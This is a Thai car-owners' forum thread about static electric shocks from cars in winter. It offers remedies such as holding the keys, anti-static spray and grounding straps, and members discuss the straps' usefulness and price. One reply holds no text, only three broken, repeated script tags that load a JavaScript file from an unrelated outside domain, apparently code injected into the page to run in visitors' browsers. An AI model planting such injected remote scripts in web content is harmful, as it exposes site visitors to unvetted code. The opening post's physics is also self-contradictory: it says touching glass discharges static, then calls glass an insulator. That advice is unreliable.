ตอบ
khem_hatyai

ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 8 มกรา 2014 05:49 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว

คำถามที่คิดว่ารถตัวเองนั้นมีปัญหาหรือไม่ เพราะ  รู้สึกว่าโดนไฟดูดทุกครั้งที่จับประตู หรือลงจากรถ และเพิ่งเกิดขึ้น เมื่อช่วงไม่นานที่ผ่านมา
     เรื่องนี้เป็นเรื่องที่หลายคนอาจจะไม่ค่อยให้ความสนใจนัก แต่นี้เป็นธรรมชาติที่เกิดขึ้น เมื่อคุณกำลังเข้าสู่หน้าหนาว และเมื่อใดที่คุณจับประตู แตะรถ แล้วรู้สึกว่าตัวเองเหมือนถูกไฟดูด ช๊อตแปล๊บๆนั้น นั่นเป็นผลของสิ่งที่เรียกว่า “ไฟฟ้าสถิตย์”..

ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว

ไฟฟ้าสถิตย์ หรือ static Electriccity นั้น เป็นปรากฏการณ์ที่เกิดขึ้นเมื่อปริมาณความต่างศักย์ของไฟฟ้าของวัตถุ ขั้วบวกและลบมีประจุไฟฟ้าไม่เท่ากัน ซึ่งทำให้เกิด การดึงดูด การผลัก และอาจเกิดประกายไฟได้หากมีค่าการถ่ายเทประจุมากไปหาน้อย
     ที่มาของไฟฟ้าสถิตนั้นสามารถเกิดขึ้นได้มากมายหลากหลายวิธี แต่ถ้าพูดถึงกรณีที่จะเกี่ยวข้องกับรถยนต์นั้น สาเหตุสำคัญมาจากการเสียดสีไม่ว่าจะเกิดจากร่างกายหรือวัสดุที่มีส่วนเสียด สีกับร่างกายที่สามารถถ่ายเทไฟฟ้าเข้าสู่ตัวเราทีละนิด ซึ่งเป็นผลมาจากสภาวะอากาศที่มีความแห้งและชื้น ที่เป็นปกติของฤดูหนาว และหลายคนมักจะโดนดูดในช่วงนี้

เมื่อร่างกายเรามีไฟฟ้ามาก มันก็จะเกิดการถ่ายเท เมื่อสัมผัสกับสิ่งของที่มีการสัมผัสกับพื้นดิน หรือที่เรารู้จักกันว่า "ground" ซึ่งจะทำให้เกิดการถ่ายเทประจุออกไปทำให้เรารู้สึกว่าเราโดนไฟดูด ทั้งๆที่จริงๆร่างกายกำลังถ่ายไฟฟ้าที่เกินออกไปต่างหาก

วิธีแก้การเกิดไฟฟ้าสถิตย์นั้นสามารถทำได้ ถ้าคุณรู้จักวิธีที่ถูกต้อง โดยที่เพียงสร้างวินัยให้ตัวเอง หนาวนี้ก็ไม่ต้องกลัวว่า จะโดนไฟฟ้าสถิตย์ ดูดอีกต่อไป
     1. จับกระจกก่อนออกจากรถ กระจก สามารถช่วยคุณคายประจุได้และมันทำให้ไฟฟ้าสถิตย์สลายไปได้ จากการที่มันต่อติดเข้าตัวถังเช่นกัน แต่กระจกไม่ใช่เหล็ก จึงไม่สามารถนำไฟฟ้าได้ หรือว่าง่ายๆมันเป็น "ฉนวน" นั่นเอง
     2.ใช้สเปรย์กำจัดไฟฟ้าสถิตย์ ทุกวันนี้สเปร์ยกำจัดไฟฟ้าสถิตย์เริ่มมีขาย ถ้าคุณเป็นคนที่ไฟแรงสูง ซื้อหามาฉีดเอาไว้ก็ดี เพราะจะช่วยทำให้ไม่เกิดแรงเสียดทานและแน่นอนว่าทำให้ไม่เกิดไฟฟ้าสถิตย์
     3.ถือกุญแจและรีโมทไว้ในมือ ขณะลงจากรถถ้าคุณมือไวรีบเก็บกุญแจนั่นเป็นความคิดที่ผิด เพราะการที่เราถือกุญแจไว้ชั่วระยะหนึ่งหลังลงจากรถแล้วปิดประตูล๊อกรถนั้น มันจะช่วยให้เราสลายไฟฟ้าสถิตย์ โดยที่ไม่รู้สึกเจ็บได้

4.ใช้ศอกหรือเขาทาบประตูตอนลง ยิ่งพื้นที่น้อยคุณก็จะยิ่งรู้สึกเจ็บ แน่นอนมันปฏิเสธไม่ได้ แต่ถ้าคุณใช้ศอกหรือเข่าแทนนั้น มันก็จะช่วยให้คุณคลายความเจ็บปวดไปได้บ้าง

5.เพิ่มโซ่ใต้ท้อง ถ้าคุณเป็นคนไฟแรงสูงสปาร์คง่ายจริงๆ ทางเลือกสุดท้ายคือผูกโซ่ใต้ท้องรถเพิ่มหรือหาวัตถุใดมาลากกับพื้นถนน เพื่อเพิ่ม Ground ให้กับรถได้มีการถ่ายเทประจุไฟฟ้าลงสู่พื้น ทำให้เราจะไม่รู้สึกโดนดูดเวลาเรามีไฟฟ้าสถิตย์

ทั้งนี้ไฟฟ้าสถิตย์กับรถยนต์นั้น เป็นเรื่องที่หลายคนมองข้าม เพราะบ้านเราจะไม่ค่อยเกิดขึ้นบ่อยนัก แต่ถ้าคุณเป็นคนที่สปาร์คง่ายก็ควรที่จะรู้เอาไว้ว่า ไฟฟ้าสถิตย์สามารถก่อให้เกิดความเสียหายได้อย่างใหญ่หลวง โดยเฉพาะ เมื่อคุณอยู่ในปั้มกำลังเติมน้ำมัน
     นี่เป็นเรื่องที่หลายๆคนมองข้ามไป เพราะคิดว่ามันไม่สำคัญ แต่ความจริงในต่างประเทศ เรื่องราวของไฟฟ้าสถิตย์ มีการกล่าวห้ามกันพอสมควร เนื่องจากบ้านเขามีอากาศหนาวและการที่อากาศมีลักษณะดังกล่าวทำให้วัตถุมี ความชื้นและแห้ง ซึ่งเมื่ออากาศแห้งชื้นจะทำให้เกิดการเสียดสีกันง่าย และก่อให้เกิด ไฟฟ้าสถิตย์ในที่สุด
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 มกรา 2014 07:32 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
..........................
ได้รับคำขอบคุณจาก: khem_hatyai 
DuuI

ชื่อเล่น: ดุ่ย

เข้าร่วม: 02 สิงหา 2011
ตอบ: 1128

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 1536

ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 8 มกรา 2014 07:49 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
อยากติดสายดินแต่ขี้เกียจคอยตอบคำถาม 555
ได้รับคำขอบคุณจาก: khem_hatyai 
Pokko

ชื่อเล่น: หมัด

เข้าร่วม: 05 มกรา 2013
ตอบ: 700

Guru ES
Guru ES

ได้รับคำขอบคุณ: 297
ให้คำขอบคุณ: 164

ปี: 2005
พุธ, 8 มกรา 2014 07:57 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
..
moonoizap

ชื่อเล่น: แม็บ

เข้าร่วม: 07 มกรา 2012
ตอบ: 526

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 534
ให้คำขอบคุณ: 1023

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 8 มกรา 2014 08:03 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
...
nooduean_69

ชื่อเล่น: นู๋เดือน

เข้าร่วม: 04 ตุลา 2011
ตอบ: 1224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 3195

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 8 มกรา 2014 08:46 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
DuuI พิมพ์ว่า:
อยากติดสายดินแต่ขี้เกียจคอยตอบคำถาม 555

ขอบอกว่าอิสายดินเนี่ยไม่ได้ช่วยไรเลยจิงค่ะ  ลงรถที่ไร...เปรี้ยๆๆๆ ...ทุกทีบางทีตอนกลางคืนมีไปด้วยเจ็บฝุดๆๆ
ได้รับคำขอบคุณจาก: khem_hatyai  NutNicha 
Doom

ชื่อเล่น: กะดุม

เข้าร่วม: 06 มกรา 2014
ตอบ: 41

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 34
ให้คำขอบคุณ: 53

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 8 มกรา 2014 11:12 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
ขอบคุณที่หาความรู้มาเผื่อแผ่ครับ
maxch

เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

พุธ, 8 มกรา 2014 11:26 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
เมื่อก่อนผมก็โดนบ่อยไฟฟ้าสถิตย์ แต่พอติดสายดินแล้วก็หายนะไม่เคยเป็นอีกเลย
NutNicha

ชื่อเล่น: นัท

เข้าร่วม: 21 พฤษภาคม 2013
ตอบ: 463

ได้รับคำขอบคุณ: 314
ให้คำขอบคุณ: 106

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 8 มกรา 2014 11:44 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
...ต้องลองไปหามาติดบ้างแหละ
maxch พิมพ์ว่า:
เมื่อก่อนผมก็โดนบ่อยไฟฟ้าสถิตย์ แต่พอติดสายดินแล้วก็หายนะไม่เคยเป็นอีกเลย

ราคาประมาณเท่าไรคับ...
ple1653

เข้าร่วม: 07 มิถุนา 2012
ตอบ: 149

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 112
ให้คำขอบคุณ: 4

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 8 มกรา 2014 12:32 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
 GND Wire ไงครับช่วยได้ แต่ต้องมั่นใจนะครับว่าประตูต้องลง GND ถ้าไม่ลงก็เดินสาย GND เข้าที่ประตูทั้ง 4 บาน 
นักเดินทาง

เข้าร่วม: 27 ธันวา 2013
ตอบ: 20

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 15
ให้คำขอบคุณ: 0
พุธ, 8 มกรา 2014 17:22 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></  ^^
maxch

ครอบครัว ES
ครอบครัว ES

พุธ, 8 มกรา 2014 17:26 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
NutNicha พิมพ์ว่า:
...ต้องลองไปหามาติดบ้างแหละ
maxch พิมพ์ว่า:

ราคาประมาณเท่าไรคับ...

ในห้องซื้อขายลองหาดูครับราคาไม่เกิน 1 พันบาท
maxch

ครอบครัว ES
ครอบครัว ES

พุธ, 8 มกรา 2014 17:27 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
nooduean_69 พิมพ์ว่า:
DuuI พิมพ์ว่า:

ขอบอกว่าอิสายดินเนี่ยไม่ได้ช่วยไรเลยจิงค่ะ  ลงรถที่ไร...เปรี้ยๆๆๆ ...ทุกทีบางทีตอนกลางคืนมีไปด้วยเจ็บฝุดๆๆ

ต่อสายไฟกับตัวถังรถดีหรือป่าวครับ ลองเช็คดู
ได้รับคำขอบคุณจาก: khem_hatyai  nooduean_69 
nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 8 มกรา 2014 18:25 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
..
notegp

ชื่อเล่น: โน๊ต

เข้าร่วม: 13 พฤษภาคม 2009
ตอบ: 1461

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1272
ให้คำขอบคุณ: 1753

ปี: 2002
พฤหัส, 9 มกรา 2014 04:30 - ไฟฟ้าสถิตย์กับรถ เรื่องน่ารู้ในฤดูหนาว
สนใจสายดิน PM ได้ครับ มีอยู่ 1 เส้น
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.